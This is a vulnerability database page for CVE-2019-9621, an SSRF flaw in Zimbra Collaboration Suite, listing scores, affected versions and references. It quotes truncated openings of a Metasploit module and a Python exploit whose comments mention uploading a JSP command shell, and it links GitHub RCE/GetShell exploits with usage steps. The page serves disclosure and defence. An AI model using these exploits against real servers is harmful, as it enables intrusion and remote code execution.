Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.5
CVSSv3

CVE-2019-9621

Published: 30/04/2019 Updated: 06/06/2019
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 511
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Subscribe to Collaboration Server

Vulnerability Summary

Zimbra Collaboration Suite prior to 8.6 patch 13, 8.7.x prior to 8.7.11 patch 10, and 8.8.x prior to 8.8.10 patch 7 or 8.8.x prior to 8.8.11 patch 3 allows SSRF via the ProxyServlet component.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

zimbra collaboration server 8.6.0

zimbra collaboration server

zimbra collaboration server 8.7.11

zimbra collaboration server 8.8.10

zimbra collaboration server 8.8.11

Exploits

Exploit DB: Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::FileDropper def initia ...
Exploit DB: Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery
#coding=utf8 import requests import sys from requestspackagesurllib3exceptions import InsecureRequestWarning requestspackagesurllib3disable_warnings(InsecureRequestWarning) base_url=sysargv[1] base_url=base_urlrstrip("/") #upload file name and content #modify by k8gege #Connect "shelljsp" using K8fly CmdShell #Because the CMD parameter is ...

Github Repositories

https://github.com/nth347/Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Zimbra-RCE-exploit RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post Tested with Zimbra 860, 8711 Usage: $ git clone githubcom/nth347/Zimbra-RCE-exploitgit $ cd Zimbra-RCE-exploit/ $ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver $ chmod +x exploitpy $ /exploitpy

https://github.com/k8gege/ZimbraExploit

Zimbra邮件系统漏洞 XXE/RCE/SSRF/Upload GetShell Exploit 1. (CVE-2019-9621 Zimbra<8.8.11 XXE GetShell Exploit)

ZimbraExploit K8Cscan调用Zimbra&lt;8811远程代码执行漏洞GetShell wwwcnblogscom/k8gege/p/10822908html CVE-2019-9621 Zimbra&lt;8811 XXE GetShell Exploit

References

CWE-918https://www.exploit-db.com/exploits/46693/https://wiki.zimbra.com/wiki/Zimbra_Security_Advisorieshttps://wiki.zimbra.com/wiki/Security_Centerhttps://blog.zimbra.com/2019/03/9826/https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.htmlhttp://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rcehttp://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.htmlhttps://bugzilla.zimbra.com/show_bug.cgi?id=109127http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.htmlhttps://nvd.nist.govhttps://github.com/nth347/Zimbra-RCE-exploithttps://www.exploit-db.com/exploits/46693
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2022-48693CVE-2024-30851CVE-2024-34460CVE-2024-2887localCVE-2024-27956remote code executionCVE-2024-34475privilege
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook